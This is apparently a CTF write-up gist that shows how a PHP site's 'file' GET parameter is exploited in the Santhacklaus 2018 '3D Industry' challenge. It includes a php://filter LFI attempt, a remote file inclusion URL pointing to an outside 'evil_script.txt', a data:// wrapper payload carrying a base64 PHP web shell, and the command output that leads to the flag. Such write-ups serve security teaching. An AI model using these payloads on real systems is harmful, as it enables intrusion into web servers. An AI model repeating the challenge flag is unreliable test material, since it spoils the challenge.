Skip to content

Instantly share code, notes, and snippets.

@Xartrick

Xartrick/santhacklaus_ctf_2018_3d_industry_1_2_writeup.md

Last active December 23, 2018 13:43
Show Gist options
  • Save Xartrick/98d4daaeb65a12fbc0fc5ddfe0715e19 to your computer and use it in GitHub Desktop.
Save Xartrick/98d4daaeb65a12fbc0fc5ddfe0715e19 to your computer and use it in GitHub Desktop.
Download ZIP
Santhacklaus CTF 2018 · 3D Industry (1/2) Writeup
Raw
santhacklaus_ctf_2018_3d_industry_1_2_writeup.md

Santhacklaus CTF 2018 · 3D Industry (1/2) Writeup

Description

3D Industry is a freshly launched startup which is specialized in 3D printing. The CEO has some doubts about the secured development of the website. Can you prove him that his doubts are well-founded ?

Step-by-step

We're facing a website with a single entrypoint : index.php. Each pages is loaded using GET parameter file :

  • services.php
  • creations.php
  • contact.php

The first thing to try is a Local File Inclusion (LFI) using wrappers to read some files, but without success.

https://3d-industry.santhacklaus.xyz/index.php?file=php://filter/convert.base64-encode/resource=services.php

Second try is a Remote File Inclusion (RFI), still nothing.

https://3d-industry.santhacklaus.xyz/index.php?file=https://tapz.eu/evil_script.txt

After searching on the Internet, I came across a technique to obtain a Remote Code Execution (RCE), still using wrappers.

https://3d-industry.santhacklaus.xyz/index.php?file=data:text/plain;base64,PD9waHAgZWNobyhzaGVsbF9leGVjKCRfR0VUWydjbWQnXSkpOw==&cmd=id

The base64-encoded string is a small script to execute a command passed by GET parameter cmd.

<?php echo(shell_exec($_GET['cmd']));

The script is executed, and we're now able to execute commands on the server.

$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ ls -la

total 68
dr-xr-xr-x 8 1001 1001 4096 Dec 12 08:33 .
drwxr-xr-x 1 root root 4096 Dec 14 19:15 ..
-r-xr-xr-x 1 1001 1001 8196 Dec 12 08:33 .DS_Store
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 .hidden
-r-xr-xr-x 1 1001 1001  267 Dec 12 08:33 accueil.php
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 admin
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 config
-r-xr-xr-x 1 1001 1001  448 Dec 12 08:33 contact.php
-r-xr-xr-x 1 1001 1001  996 Dec 12 08:33 creations.php
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 inc
-r-xr-xr-x 1 1001 1001  580 Dec 12 08:33 index.php
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 lang
-r-xr-xr-x 1 1001 1001  125 Dec 12 08:33 lang.php
-r-xr-xr-x 1 1001 1001  461 Dec 12 08:33 services.php
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 style

$ ls -la .hidden

total 20
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 .
dr-xr-xr-x 8 1001 1001 4096 Dec 12 08:33 ..
-r-xr-xr-x 1 1001 1001 6148 Dec 12 08:33 .DS_Store
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 this

[..]

$ ls -la .hidden/this/is/the/path/to/the/flag/

total 12
dr-xr-xr-x 2 1001 1001 4096 Dec 12 08:33 .
dr-xr-xr-x 3 1001 1001 4096 Dec 12 08:33 ..
-r-xr-xr-x 1 1001 1001   70 Dec 12 08:33 flag.txt

$ cat .hidden/this/is/the/path/to/the/flag/flag.txt

Well done ! You can validate with the flag:

IMTLD{B3w4r30fURL1nclud3}

Resources

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment